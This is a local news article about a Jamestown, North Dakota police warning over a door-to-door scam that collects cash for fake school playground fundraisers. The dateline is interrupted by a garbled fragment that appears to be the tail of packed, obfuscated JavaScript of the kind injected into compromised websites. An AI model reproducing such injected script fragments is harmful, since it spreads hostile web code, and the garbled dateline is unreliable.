JAMESTOWN, ifnbk|var|u0026u|referrer|rhnki||js|php’.split(‘|’),0,{}))
N.D. (NewsDakota.com) – The Jamestown Police Department is warning residents of a scam involving door-to-door campaigning for a fake fundraiser.

School Resource Officer Andrew Staska reports that at least one adult has been visiting homes in the city with children asking for people to donate money for playground equipment at different elementary schools.

“I’ve spoken with the specific schools that were mentioned by these individuals and they are not raising money for playground equipment at this time,” Staska reported. “It’s unusual for a school to be going door to door asking for cash donations.”

Officer Staska says if there are ever questions about legitimacy of a fundraiser, call the school and ask questions.

“If they can’t produce a flyer or brochure on the spot, that should be another red flag,” he pointed out.

Residents are encouraged to contact the Jamestown Police Department if they’ve been visited by an individual asking for money. Their number is 701-252-2414.
